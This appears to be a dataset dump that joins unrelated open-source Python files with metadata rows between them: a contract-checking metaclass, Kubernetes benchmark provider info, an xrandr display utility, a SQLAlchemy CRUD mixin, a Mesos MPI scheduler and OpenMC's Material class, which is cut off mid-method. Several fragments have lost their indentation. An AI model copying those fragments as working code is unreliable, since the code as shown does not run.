def dbc_wrapper(self, *args, **kwargs):
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
return result
elif preinvariant is None and precondition is None \
and postcondition is None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
result = _method(self, *args, **kwargs)
postinvariant_check(postinvariant(self))
return result
elif preinvariant is None and precondition is None \
and postcondition is None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
result = _method(self, *args, **kwargs)
return result
if have_python_24:
dbc_wrapper.__name__ = _methodname
return dbc_wrapper
_wrap = staticmethod(_wrap)
def __new__(_class, _name, _bases, _dict):
# because the mro for the class being created is not yet available
# we'll have to build it by hand using our own mro implementation
mro = merged_mro(*_bases) # the lack of _class itself in mro is compensated ...
dict_with_bases = {}
for base in reversed(mro):
if hasattr(base, "__dict__"):
dict_with_bases.update(base.__dict__)
dict_with_bases.update(_dict) # ... here by explicitly adding it's method last
try:
invariant = dict_with_bases["invariant"]
except KeyError:
invariant = None
for name, target in dict_with_bases.iteritems():
if isinstance(target, FunctionType) and name != "__del__" and name != "invariant" \
and not name.startswith("pre_") and not name.startswith("post_"):
try:
pre = dict_with_bases["pre_%s" % name]
except KeyError:
pre = None
try:
post = dict_with_bases["post_%s" % name]
except KeyError:
post = None
# note that __del__ is not checked at all
_dict[name] = ContractFactory._wrap(target,
name != "__init__" and invariant or None,
pre or None, post or None, invariant or None,
_name, name)
return super(ContractFactory, _class).__new__(_class, _name, _bases, _dict)
class ContractBase(object):
if CONTRACT_CHECKS_ENABLED:
__metaclass__ = ContractFactory
###############################################################################
| mit | -315,259,735,851,058,900 | 43.401662 | 118 | 0.558924 | false |
meteorfox/PerfKitBenchmarker | perfkitbenchmarker/providers/kubernetes/provider_info.py | 1 | 1386 | # Copyright 2015 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Provider info for Kubernetes
"""
from perfkitbenchmarker import providers
from perfkitbenchmarker import provider_info
class KubernetesProviderInfo(provider_info.BaseProviderInfo):
SUPPORTED_BENCHMARKS = ['block_storage_workload', 'cassandra_ycsb',
'cassandra_stress', 'cluster_boot', 'fio',
'iperf', 'mesh_network', 'mongodb_ycsb',
'netperf', 'redis', 'sysbench_oltp']
UNSUPPORTED_BENCHMARKS = ['bonnieplusplus', 'mysql_service']
CLOUD = providers.KUBERNETES
@classmethod
def IsBenchmarkSupported(cls, benchmark):
if benchmark in cls.SUPPORTED_BENCHMARKS:
return True
elif benchmark in cls.UNSUPPORTED_BENCHMARKS:
return False
else:
return None
| apache-2.0 | 4,174,904,977,737,770,500 | 33.65 | 74 | 0.7114 | false |
RobLoach/lutris | lutris/util/display.py | 1 | 3005 | import subprocess
from lutris.util.log import logger
def get_vidmodes():
xrandr_output = subprocess.Popen(["xrandr"],
stdout=subprocess.PIPE).communicate()[0]
return list([line for line in xrandr_output.decode().split("\n")])
def get_outputs():
"""Return list of tuples containing output name and geometry."""
outputs = []
vid_modes = get_vidmodes()
if not vid_modes:
logger.error("xrandr didn't return anything")
return []
for line in vid_modes:
parts = line.split()
if len(parts) < 2:
continue
if parts[1] == 'connected':
if len(parts) == 2:
continue
geom = parts[2] if parts[2] != 'primary' else parts[3]
if geom.startswith('('): # Screen turned off, no geometry
continue
outputs.append((parts[0], geom))
return outputs
def get_output_names():
return [output[0] for output in get_outputs()]
def turn_off_except(display):
for output in get_outputs():
if output[0] != display:
subprocess.Popen(["xrandr", "--output", output[0], "--off"])
def get_resolutions():
"""Return the list of supported screen resolutions."""
resolution_list = []
for line in get_vidmodes():
if line.startswith(" "):
resolution_list.append(line.split()[0])
return resolution_list
def get_current_resolution(monitor=0):
"""Return the current resolution for the desktop."""
resolution = list()
for line in get_vidmodes():
if line.startswith(" ") and "*" in line:
resolution.append(line.split()[0])
if monitor == 'all':
return resolution
else:
return resolution[monitor]
def change_resolution(resolution):
"""Change display resolution.
Takes a string for single monitors or a list of displays as returned
by get_outputs().
"""
if not resolution:
logger.warning("No resolution provided")
return
if isinstance(resolution, str):
logger.debug("Switching resolution to %s", resolution)
if resolution not in get_resolutions():
logger.warning("Resolution %s doesn't exist." % resolution)
else:
subprocess.Popen(["xrandr", "-s", resolution])
else:
for display in resolution:
display_name = display[0]
logger.debug("Switching to %s on %s", display[1], display[0])
display_geom = display[1].split('+')
display_resolution = display_geom[0]
position = (display_geom[1], display_geom[2])
subprocess.Popen([
"xrandr",
"--output", display_name,
"--mode", display_resolution,
"--pos", "{}x{}".format(position[0], position[1])
]).communicate()
def restore_gamma():
"""Restores gamma to a normal level."""
subprocess.Popen(["xgamma", "-gamma", "1.0"])
| gpl-3.0 | 8,808,335,972,586,504,000 | 29.663265 | 77 | 0.575707 | false |
ctsit/redi-dropper-client | app/redidropper/database/crud_mixin.py | 1 | 1438 | """
Goal: simplify the code when interacting with entities
Usage when declaring a model:
import db
class MyEntity(db.Model, CRUDMixin):
id = db.Column('myID', db.Integer, primary_key=True)
data = db.Column('myData', db.String(255))
MyTableEntity.create(data="abc")
my = MyTableEntity(data="abc")
db.session.save(my, commit=False)
found = MyTableEntity.get_by_id(1) is not None
"""
from redidropper.main import db
class CRUDMixin(object):
""" Helper class flask-sqlalchemy entities """
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True)
@classmethod
def get_by_id(cls, id):
if any(
(isinstance(id, basestring) and id.isdigit(),
isinstance(id, (int, float))),
):
return cls.query.get(int(id))
return None
@classmethod
def create(cls, **kwargs):
""" Helper for session.add() + session.commit() """
instance = cls(**kwargs)
return instance.save()
def update(self, commit=True, **kwargs):
for attr, value in kwargs.iteritems():
setattr(self, attr, value)
return self.save() if commit else self
def save(self, commit=True):
db.session.add(self)
if commit:
db.session.commit()
return self
def delete(self, commit=True):
db.session.delete(self)
return commit and db.session.commit()
| bsd-3-clause | -703,312,452,427,858,200 | 25.145455 | 59 | 0.616134 | false |
gogoair/foremast | src/foremast/utils/__init__.py | 1 | 1409 | # Foremast - Pipeline Tooling
#
# Copyright 2018 Gogo, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Package for foremast supporting utilities."""
from .apps import *
from .asg import *
from .banners import *
from .pipelines import *
from .deep_chain_map import DeepChainMap
from .elb import *
from .encoding import *
from .generate_filename import *
from .dns import *
from .credentials import *
from .properties import *
from .security_group import *
from .subnets import *
from .vpc import *
from .lookups import *
from .slack import *
from .tasks import *
from .templates import *
from .warn_user import *
from .get_cloudwatch_event_rule import get_cloudwatch_event_rule
from .awslambda import *
from .get_sns_subscriptions import get_sns_subscriptions
from .get_sns_topic_arn import get_sns_topic_arn
from .dynamodb_stream import get_dynamodb_stream_arn
from .roles import *
| apache-2.0 | -4,017,467,727,844,260,000 | 33.365854 | 76 | 0.751597 | false |
mesosphere/mesos-hydra | mrun.py | 1 | 8006 | #!/usr/bin/env python
import mesos
import mesos_pb2
import os
import logging
import re
import sys
import time
import math
import threading
import socket
import time
import tempfile
from optparse import OptionParser
from subprocess import *
def printOutput(p):
for line in p.stdout:
print line,
def startMPIExec(procs, slaves, program):
os.symlink(os.getcwd() + '/export', work_dir + "/export")
os.chdir(work_dir)
hosts = ",".join(slaves)
cmd = ["./export/bin/mpiexec.hydra", "-genv", "LD_LIBRARY_PATH", work_dir + "/libs", "-launcher", "manual", "-n", str(procs), "-hosts", str(hosts)]
cmd.extend(program)
p = Popen(cmd, stdout=PIPE)
proxy_args = []
while True:
line = p.stdout.readline()
if line == 'HYDRA_LAUNCH_END\n':
break
proxy_args.append(line)
# Print rest MPI output.
t = threading.Thread(target=printOutput, args=([p]))
t.start()
return proxy_args
def finalizeSlaves(callbacks):
time.sleep(1)
logging.info("Finalize slaves")
hosts = []
for slave in callbacks:
hosts.append(slave[0])
proxy_args = startMPIExec(total_procs, hosts, mpi_program)
proxy_id = 0
for slave in callbacks:
chost = slave[0]
cport = int(slave[1])
proxy_arg = proxy_args[proxy_id]
proxy_id += 1
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((chost, cport))
request = work_dir + ";" + proxy_arg
s.send(request)
s.close()
# TODO(nnielsen): Add retry logic; slave might not be listening yet.
logging.info("Done finalizing slaves")
class HydraScheduler(mesos.Scheduler):
def __init__(self, options):
self.proxiesLaunched = 0
self.proxiesRunning = 0
self.proxiesFinished = 0
self.options = options
self.startedExec = False
self.slaves = set()
self.callbacks = []
self.finalizeTriggered = False
def registered(self, driver, fid, masterInfo):
logging.info("Registered with framework ID %s" % fid.value)
def resourceOffers(self, driver, offers):
for offer in offers:
if self.proxiesLaunched == total_nodes:
driver.declineOffer(offer.id)
continue
cpus = 0
mem = 0
tasks = []
if offer.hostname in self.slaves:
logging.info("Declining offer: offer from slave already scheduled")
for resource in offer.resources:
if resource.name == "cpus":
cpus = resource.scalar.value
elif resource.name == "mem":
mem = resource.scalar.value
elif resource.name == "ports":
port = resource.ranges.range[0].begin
if cpus < cores_per_node or mem < mem_per_node:
logging.info("Declining offer due to too few resources")
driver.declineOffer(offer.id)
else:
tid = self.proxiesLaunched
self.proxiesLaunched += 1
logging.info("Launching proxy on offer %s from %s" % (offer.id, offer.hostname))
task = mesos_pb2.TaskInfo()
task.task_id.value = str(tid)
task.slave_id.value = offer.slave_id.value
task.name = "task %d " % tid
cpus = task.resources.add()
cpus.name = "cpus"
cpus.type = mesos_pb2.Value.SCALAR
cpus.scalar.value = cores_per_node
mem = task.resources.add()
mem.name = "mem"
mem.type = mesos_pb2.Value.SCALAR
mem.scalar.value = mem_per_node
ports = task.resources.add()
ports.name = "ports"
ports.type = mesos_pb2.Value.RANGES
r = ports.ranges.range.add()
r.begin = port
r.end = port
lib = task.command.environment.variables.add()
lib.name = "LD_LIBRARY_PATH"
lib.value = work_dir + "/libs"
hydra_uri = task.command.uris.add()
hydra_uri.value = "hdfs://" + name_node + "/hydra/hydra.tgz"
executable_uri = task.command.uris.add()
executable_uri.value = "hdfs://" + name_node + "/hydra/" + mpi_program[0]
task.command.value = "python hydra-proxy.py %d" % port
tasks.append(task)
logging.info("Replying to offer: launching proxy %d on host %s" % (tid, offer.hostname))
logging.info("Call-back at %s:%d" % (offer.hostname, port))
self.callbacks.append([offer.hostname, port])
self.slaves.add(offer.hostname)
driver.launchTasks(offer.id, tasks)
def statusUpdate(self, driver, update):
if (update.state == mesos_pb2.TASK_FAILED or
update.state == mesos_pb2.TASK_KILLED or
update.state == mesos_pb2.TASK_LOST):
logging.error("A task finished unexpectedly: " + update.message)
driver.stop()
if (update.state == mesos_pb2.TASK_RUNNING):
self.proxiesRunning += 1
# Trigger real launch when threshold is met.
if self.proxiesRunning >= total_nodes and not self.finalizeTriggered:
self.finalizeTriggered = True
threading.Thread(target = finalizeSlaves, args = ([self.callbacks])).start()
if (update.state == mesos_pb2.TASK_FINISHED):
self.proxiesFinished += 1
if self.proxiesFinished == total_nodes:
logging.info("All processes done, exiting")
driver.stop()
def offerRescinded(self, driver, offer_id):
logging.info("Offer %s rescinded" % offer_id)
if __name__ == "__main__":
parser = OptionParser(usage="Usage: %prog [options] mesos_master mpi_program")
parser.disable_interspersed_args()
parser.add_option("-N", "--nodes",
help="number of nodes to run processes (default 1)",
dest="nodes", type="int", default=1)
parser.add_option("-n", "--num",
help="total number of MPI processes (default 1)",
dest="procs", type="int", default=1)
parser.add_option("-c", "--cpus-per-task",
help="number of cores per MPI process (default 1)",
dest="cores", type="int", default=1)
parser.add_option("-m","--mem",
help="number of MB of memory per MPI process (default 1GB)",
dest="mem", type="int", default=1024)
parser.add_option("--proxy",
help="url to proxy binary", dest="proxy", type="string")
parser.add_option("--name",
help="framework name", dest="name", type="string")
parser.add_option("--hdfs",
help="HDFS Name node", dest="name_node", type="string")
parser.add_option("-p","--path",
help="path to look for MPICH2 binaries (mpiexec)",
dest="path", type="string", default="")
parser.add_option("-v", action="store_true", dest="verbose")
# Add options to configure cpus and mem.
(options,args) = parser.parse_args()
if len(args) < 2:
print >> sys.stderr, "At least two parameters required."
print >> sys.stderr, "Use --help to show usage."
exit(2)
if options.verbose == True:
logging.basicConfig(level=logging.INFO)
total_procs = options.procs
total_nodes = options.nodes
cores = options.cores
procs_per_node = math.ceil(total_procs / total_nodes)
cores_per_node = procs_per_node * cores
mem_per_node = options.mem
mpi_program = args[1:]
name_node = options.name_node
if name_node == None:
name_node = os.environ.get("HDFS_NAME_NODE")
if name_node == None:
print >> sys.stderr, "HDFS name node not found."
exit(2)
logging.info("Connecting to Mesos master %s" % args[0])
logging.info("Total processes %d" % total_procs)
logging.info("Total nodes %d" % total_nodes)
logging.info("Procs per node %d" % procs_per_node)
logging.info("Cores per node %d" % cores_per_node)
scheduler = HydraScheduler(options)
framework = mesos_pb2.FrameworkInfo()
framework.user = ""
if options.name is not None:
framework.name = options.name
else:
framework.name = "MPICH2 Hydra : %s" % mpi_program[0]
work_dir = tempfile.mkdtemp()
driver = mesos.MesosSchedulerDriver(
scheduler,
framework,
args[0])
sys.exit(0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1)
| apache-2.0 | 2,096,012,464,750,074,400 | 30.031008 | 149 | 0.624032 | false |
walshjon/openmc | openmc/material.py | 1 | 35739 | from collections import OrderedDict
from copy import deepcopy
from numbers import Real, Integral
import warnings
from xml.etree import ElementTree as ET
import numpy as np
import openmc
import openmc.data
import openmc.checkvalue as cv
from openmc.clean_xml import clean_xml_indentation
from .mixin import IDManagerMixin
# Units for density supported by OpenMC
DENSITY_UNITS = ['g/cm3', 'g/cc', 'kg/m3', 'atom/b-cm', 'atom/cm3', 'sum',
'macro']
class Material(IDManagerMixin):
"""A material composed of a collection of nuclides/elements.
To create a material, one should create an instance of this class, add
nuclides or elements with :meth:`Material.add_nuclide` or
`Material.add_element`, respectively, and set the total material density
with `Material.set_density()`. The material can then be assigned to a cell
using the :attr:`Cell.fill` attribute.
Parameters
----------
material_id : int, optional
Unique identifier for the material. If not specified, an identifier will
automatically be assigned.
name : str, optional
Name of the material. If not specified, the name will be the empty
string.
temperature : float, optional
Temperature of the material in Kelvin. If not specified, the material
inherits the default temperature applied to the model.
Attributes
----------
id : int
Unique identifier for the material
temperature : float
Temperature of the material in Kelvin.
density : float
Density of the material (units defined separately)
density_units : str
Units used for `density`. Can be one of 'g/cm3', 'g/cc', 'kg/m3',
'atom/b-cm', 'atom/cm3', 'sum', or 'macro'. The 'macro' unit only
applies in the case of a multi-group calculation.
depletable : bool
Indicate whether the material is depletable.
nuclides : list of tuple
List in which each item is a 3-tuple consisting of a nuclide string, the
percent density, and the percent type ('ao' or 'wo').
isotropic : list of str
Nuclides for which elastic scattering should be treated as though it
were isotropic in the laboratory system.
average_molar_mass : float
The average molar mass of nuclides in the material in units of grams per
mol. For example, UO2 with 3 nuclides will have an average molar mass
of 270 / 3 = 90 g / mol.
volume : float
Volume of the material in cm^3. This can either be set manually or
calculated in a stochastic volume calculation and added via the
:meth:`Material.add_volume_information` method.
paths : list of str
The paths traversed through the CSG tree to reach each material
instance. This property is initialized by calling the
:meth:`Geometry.determine_paths` method.
num_instances : int
The number of instances of this material throughout the geometry.
fissionable_mass : float
Mass of fissionable nuclides in the material in [g]. Requires that the
:attr:`volume` attribute is set.
"""
next_id = 1
used_ids = set()
def __init__(self, material_id=None, name='', temperature=None):
# Initialize class attributes
self.id = material_id
self.name = name
self.temperature = temperature
self._density = None
self._density_units = 'sum'
self._depletable = False
self._paths = None
self._num_instances = None
self._volume = None
self._atoms = {}
self._isotropic = []
# A list of tuples (nuclide, percent, percent type)
self._nuclides = []
# The single instance of Macroscopic data present in this material
# (only one is allowed, hence this is different than _nuclides, etc)
self._macroscopic = None
# If specified, a list of table names
self._sab = []
# If true, the material will be initialized as distributed
self._convert_to_distrib_comps = False
# If specified, this file will be used instead of composition values
self._distrib_otf_file = None
def __repr__(self):
string = 'Material\n'
string += '{: <16}=\t{}\n'.format('\tID', self._id)
string += '{: <16}=\t{}\n'.format('\tName', self._name)
string += '{: <16}=\t{}\n'.format('\tTemperature', self._temperature)
string += '{: <16}=\t{}'.format('\tDensity', self._density)
string += ' [{}]\n'.format(self._density_units)
string += '{: <16}\n'.format('\tS(a,b) Tables')
for sab in self._sab:
string += '{: <16}=\t{}\n'.format('\tS(a,b)', sab)
string += '{: <16}\n'.format('\tNuclides')
for nuclide, percent, percent_type in self._nuclides:
string += '{: <16}'.format('\t{}'.format(nuclide))
string += '=\t{: <12} [{}]\n'.format(percent, percent_type)
if self._macroscopic is not None:
string += '{: <16}\n'.format('\tMacroscopic Data')
string += '{: <16}'.format('\t{}'.format(self._macroscopic))
return string
@property
def name(self):
return self._name
@property
def temperature(self):
return self._temperature
@property
def density(self):
return self._density
@property
def density_units(self):
return self._density_units
@property
def depletable(self):
return self._depletable
@property
def paths(self):
if self._paths is None:
raise ValueError('Material instance paths have not been determined. '
'Call the Geometry.determine_paths() method.')
return self._paths
@property
def num_instances(self):
if self._num_instances is None:
raise ValueError(
'Number of material instances have not been determined. Call '
'the Geometry.determine_paths() method.')
return self._num_instances
@property
def nuclides(self):
return self._nuclides
@property
def isotropic(self):
return self._isotropic
@property
def convert_to_distrib_comps(self):
return self._convert_to_distrib_comps
@property
def distrib_otf_file(self):
return self._distrib_otf_file
@property
def average_molar_mass(self):
# Get a list of all the nuclides, with elements expanded
nuclide_densities = self.get_nuclide_densities()
# Using the sum of specified atomic or weight amounts as a basis, sum
# the mass and moles of the material
mass = 0.
moles = 0.
for nuc, vals in nuclide_densities.items():
if vals[2] == 'ao':
mass += vals[1] * openmc.data.atomic_mass(nuc)
moles += vals[1]
else:
moles += vals[1] / openmc.data.atomic_mass(nuc)
mass += vals[1]
# Compute and return the molar mass
return mass / moles
@property
def volume(self):
return self._volume
@name.setter
def name(self, name):
if name is not None:
cv.check_type('name for Material ID="{}"'.format(self._id),
name, str)
self._name = name
else:
self._name = ''
@temperature.setter
def temperature(self, temperature):
cv.check_type('Temperature for Material ID="{}"'.format(self._id),
temperature, (Real, type(None)))
self._temperature = temperature
@depletable.setter
def depletable(self, depletable):
cv.check_type('Depletable flag for Material ID="{}"'.format(self.id),
depletable, bool)
self._depletable = depletable
@volume.setter
def volume(self, volume):
if volume is not None:
cv.check_type('material volume', volume, Real)
self._volume = volume
@isotropic.setter
def isotropic(self, isotropic):
cv.check_iterable_type('Isotropic scattering nuclides', isotropic,
str)
self._isotropic = list(isotropic)
@property
def fissionable_mass(self):
if self.volume is None:
raise ValueError("Volume must be set in order to determine mass.")
density = 0.0
for nuc, atoms_per_cc in self.get_nuclide_atom_densities().values():
Z = openmc.data.zam(nuc)[0]
if Z >= 90:
density += 1e24 * atoms_per_cc * openmc.data.atomic_mass(nuc) \
/ openmc.data.AVOGADRO
return density*self.volume
@classmethod
def from_hdf5(cls, group):
"""Create material from HDF5 group
Parameters
----------
group : h5py.Group
Group in HDF5 file
Returns
-------
openmc.Material
Material instance
"""
mat_id = int(group.name.split('/')[-1].lstrip('material '))
name = group['name'].value.decode() if 'name' in group else ''
density = group['atom_density'].value
nuc_densities = group['nuclide_densities'][...]
nuclides = group['nuclides'].value
# Create the Material
material = cls(mat_id, name)
material.depletable = bool(group.attrs['depletable'])
# Read the names of the S(a,b) tables for this Material and add them
if 'sab_names' in group:
sab_tables = group['sab_names'].value
for sab_table in sab_tables:
name = sab_table.decode()
material.add_s_alpha_beta(name)
# Set the Material's density to atom/b-cm as used by OpenMC
material.set_density(density=density, units='atom/b-cm')
# Add all nuclides to the Material
for fullname, density in zip(nuclides, nuc_densities):
name = fullname.decode().strip()
material.add_nuclide(name, percent=density, percent_type='ao')
return material
def add_volume_information(self, volume_calc):
"""Add volume information to a material.
Parameters
----------
volume_calc : openmc.VolumeCalculation
Results from a stochastic volume calculation
"""
if volume_calc.domain_type == 'material':
if self.id in volume_calc.volumes:
self._volume = volume_calc.volumes[self.id].n
self._atoms = volume_calc.atoms[self.id]
else:
raise ValueError('No volume information found for this material.')
else:
raise ValueError('No volume information found for this material.')
def set_density(self, units, density=None):
"""Set the density of the material
Parameters
----------
units : {'g/cm3', 'g/cc', 'kg/m3', 'atom/b-cm', 'atom/cm3', 'sum', 'macro'}
Physical units of density.
density : float, optional
Value of the density. Must be specified unless units is given as
'sum'.
"""
cv.check_value('density units', units, DENSITY_UNITS)
self._density_units = units
if units == 'sum':
if density is not None:
msg = 'Density "{}" for Material ID="{}" is ignored ' \
'because the unit is "sum"'.format(density, self.id)
warnings.warn(msg)
else:
if density is None:
msg = 'Unable to set the density for Material ID="{}" ' \
'because a density value must be given when not using ' \
'"sum" unit'.format(self.id)
raise ValueError(msg)
cv.check_type('the density for Material ID="{}"'.format(self.id),
density, Real)
self._density = density
@distrib_otf_file.setter
def distrib_otf_file(self, filename):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
if not isinstance(filename, str) and filename is not None:
msg = 'Unable to add OTF material file to Material ID="{}" with a ' \
'non-string name "{}"'.format(self._id, filename)
raise ValueError(msg)
self._distrib_otf_file = filename
@convert_to_distrib_comps.setter
def convert_to_distrib_comps(self):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
self._convert_to_distrib_comps = True
def add_nuclide(self, nuclide, percent, percent_type='ao'):
"""Add a nuclide to the material
Parameters
----------
nuclide : str
Nuclide to add, e.g., 'Mo95'
percent : float
Atom or weight percent
percent_type : {'ao', 'wo'}
'ao' for atom percent and 'wo' for weight percent
"""
cv.check_type('nuclide', nuclide, str)
cv.check_type('percent', percent, Real)
cv.check_value('percent type', percent_type, {'ao', 'wo'})
if self._macroscopic is not None:
msg = 'Unable to add a Nuclide to Material ID="{}" as a ' \
'macroscopic data-set has already been added'.format(self._id)
raise ValueError(msg)
# If nuclide name doesn't look valid, give a warning
try:
Z, _, _ = openmc.data.zam(nuclide)
except ValueError as e:
warnings.warn(str(e))
else:
# For actinides, have the material be depletable by default
if Z >= 89:
self.depletable = True
self._nuclides.append((nuclide, percent, percent_type))
def remove_nuclide(self, nuclide):
"""Remove a nuclide from the material
Parameters
----------
nuclide : str
Nuclide to remove
"""
cv.check_type('nuclide', nuclide, str)
# If the Material contains the Nuclide, delete it
for nuc in self._nuclides:
if nuclide == nuc[0]:
self._nuclides.remove(nuc)
break
def add_macroscopic(self, macroscopic):
"""Add a macroscopic to the material. This will also set the
density of the material to 1.0, unless it has been otherwise set,
as a default for Macroscopic cross sections.
Parameters
----------
macroscopic : str
Macroscopic to add
"""
# Ensure no nuclides, elements, or sab are added since these would be
# incompatible with macroscopics
if self._nuclides or self._sab:
msg = 'Unable to add a Macroscopic data set to Material ID="{}" ' \
'with a macroscopic value "{}" as an incompatible data ' \
'member (i.e., nuclide or S(a,b) table) ' \
'has already been added'.format(self._id, macroscopic)
raise ValueError(msg)
if not isinstance(macroscopic, str):
msg = 'Unable to add a Macroscopic to Material ID="{}" with a ' \
'non-string value "{}"'.format(self._id, macroscopic)
raise ValueError(msg)
if self._macroscopic is None:
self._macroscopic = macroscopic
else:
msg = 'Unable to add a Macroscopic to Material ID="{}". ' \
'Only one Macroscopic allowed per ' \
'Material.'.format(self._id)
raise ValueError(msg)
# Generally speaking, the density for a macroscopic object will
# be 1.0. Therefore, lets set density to 1.0 so that the user
# doesnt need to set it unless its needed.
# Of course, if the user has already set a value of density,
# then we will not override it.
if self._density is None:
self.set_density('macro', 1.0)
def remove_macroscopic(self, macroscopic):
"""Remove a macroscopic from the material
Parameters
----------
macroscopic : str
Macroscopic to remove
"""
if not isinstance(macroscopic, str):
msg = 'Unable to remove a Macroscopic "{}" in Material ID="{}" ' \
'since it is not a string'.format(self._id, macroscopic)
raise ValueError(msg)
# If the Material contains the Macroscopic, delete it
if macroscopic == self._macroscopic:
self._macroscopic = None
def add_element(self, element, percent, percent_type='ao', enrichment=None):
"""Add a natural element to the material
Parameters
----------
element : str
Element to add, e.g., 'Zr'
percent : float
Atom or weight percent
percent_type : {'ao', 'wo'}, optional
'ao' for atom percent and 'wo' for weight percent. Defaults to atom
percent.
enrichment : float, optional
Enrichment for U235 in weight percent. For example, input 4.95 for
4.95 weight percent enriched U. Default is None
(natural composition).
"""
cv.check_type('nuclide', element, str)
cv.check_type('percent', percent, Real)
cv.check_value('percent type', percent_type, {'ao', 'wo'})
if self._macroscopic is not None:
msg = 'Unable to add an Element to Material ID="{}" as a ' \
'macroscopic data-set has already been added'.format(self._id)
raise ValueError(msg)
if enrichment is not None:
if not isinstance(enrichment, Real):
msg = 'Unable to add an Element to Material ID="{}" with a ' \
'non-floating point enrichment value "{}"'\
.format(self._id, enrichment)
raise ValueError(msg)
elif element != 'U':
msg = 'Unable to use enrichment for element {} which is not ' \
'uranium for Material ID="{}"'.format(element, self._id)
raise ValueError(msg)
# Check that the enrichment is in the valid range
cv.check_less_than('enrichment', enrichment, 100./1.008)
cv.check_greater_than('enrichment', enrichment, 0., equality=True)
if enrichment > 5.0:
msg = 'A uranium enrichment of {} was given for Material ID='\
'"{}". OpenMC assumes the U234/U235 mass ratio is '\
'constant at 0.008, which is only valid at low ' \
'enrichments. Consider setting the isotopic ' \
'composition manually for enrichments over 5%.'.\
format(enrichment, self._id)
warnings.warn(msg)
# Make sure element name is just that
if not element.isalpha():
raise ValueError("Element name should be given by the "
"element's symbol, e.g., 'Zr'")
# Add naturally-occuring isotopes
element = openmc.Element(element)
for nuclide in element.expand(percent, percent_type, enrichment):
self.add_nuclide(*nuclide)
def add_s_alpha_beta(self, name, fraction=1.0):
r"""Add an :math:`S(\alpha,\beta)` table to the material
Parameters
----------
name : str
Name of the :math:`S(\alpha,\beta)` table
fraction : float
The fraction of relevant nuclei that are affected by the
:math:`S(\alpha,\beta)` table. For example, if the material is a
block of carbon that is 60% graphite and 40% amorphous then add a
graphite :math:`S(\alpha,\beta)` table with fraction=0.6.
"""
if self._macroscopic is not None:
msg = 'Unable to add an S(a,b) table to Material ID="{}" as a ' \
'macroscopic data-set has already been added'.format(self._id)
raise ValueError(msg)
if not isinstance(name, str):
msg = 'Unable to add an S(a,b) table to Material ID="{}" with a ' \
'non-string table name "{}"'.format(self._id, name)
raise ValueError(msg)
cv.check_type('S(a,b) fraction', fraction, Real)
cv.check_greater_than('S(a,b) fraction', fraction, 0.0, True)
cv.check_less_than('S(a,b) fraction', fraction, 1.0, True)
new_name = openmc.data.get_thermal_name(name)
if new_name != name:
msg = 'OpenMC S(a,b) tables follow the GND naming convention. ' \
'Table "{}" is being renamed as "{}".'.format(name, new_name)
warnings.warn(msg)
self._sab.append((new_name, fraction))
def make_isotropic_in_lab(self):
self.isotropic = [x[0] for x in self._nuclides]
def get_nuclides(self):
"""Returns all nuclides in the material
Returns
-------
nuclides : list of str
List of nuclide names
"""
return [x[0] for x in self._nuclides]
def get_nuclide_densities(self):
"""Returns all nuclides in the material and their densities
Returns
-------
nuclides : dict
Dictionary whose keys are nuclide names and values are 3-tuples of
(nuclide, density percent, density percent type)
"""
nuclides = OrderedDict()
for nuclide, density, density_type in self._nuclides:
nuclides[nuclide] = (nuclide, density, density_type)
return nuclides
def get_nuclide_atom_densities(self):
"""Returns all nuclides in the material and their atomic densities in
units of atom/b-cm
Returns
-------
nuclides : dict
Dictionary whose keys are nuclide names and values are tuples of
(nuclide, density in atom/b-cm)
"""
# Expand elements in to nuclides
nuclides = self.get_nuclide_densities()
sum_density = False
if self.density_units == 'sum':
sum_density = True
density = 0.
elif self.density_units == 'macro':
density = self.density
elif self.density_units == 'g/cc' or self.density_units == 'g/cm3':
density = -self.density
elif self.density_units == 'kg/m3':
density = -0.001 * self.density
elif self.density_units == 'atom/b-cm':
density = self.density
elif self.density_units == 'atom/cm3' or self.density_units == 'atom/cc':
density = 1.E-24 * self.density
# For ease of processing split out nuc, nuc_density,
# and nuc_density_type in to separate arrays
nucs = []
nuc_densities = []
nuc_density_types = []
for nuclide in nuclides.items():
nuc, nuc_density, nuc_density_type = nuclide[1]
nucs.append(nuc)
nuc_densities.append(nuc_density)
nuc_density_types.append(nuc_density_type)
nucs = np.array(nucs)
nuc_densities = np.array(nuc_densities)
nuc_density_types = np.array(nuc_density_types)
if sum_density:
density = np.sum(nuc_densities)
percent_in_atom = np.all(nuc_density_types == 'ao')
density_in_atom = density > 0.
sum_percent = 0.
# Convert the weight amounts to atomic amounts
if not percent_in_atom:
for n, nuc in enumerate(nucs):
nuc_densities[n] *= self.average_molar_mass / \
openmc.data.atomic_mass(nuc)
# Now that we have the atomic amounts, lets finish calculating densities
sum_percent = np.sum(nuc_densities)
nuc_densities = nuc_densities / sum_percent
# Convert the mass density to an atom density
if not density_in_atom:
density = -density / self.average_molar_mass * 1.E-24 \
* openmc.data.AVOGADRO
nuc_densities = density * nuc_densities
nuclides = OrderedDict()
for n, nuc in enumerate(nucs):
nuclides[nuc] = (nuc, nuc_densities[n])
return nuclides
def get_mass_density(self, nuclide=None):
"""Return mass density of one or all nuclides
Parameters
----------
nuclides : str, optional
Nuclide for which density is desired. If not specified, the density
for the entire material is given.
Returns
-------
float
Density of the nuclide/material in [g/cm^3]
"""
mass_density = 0.0
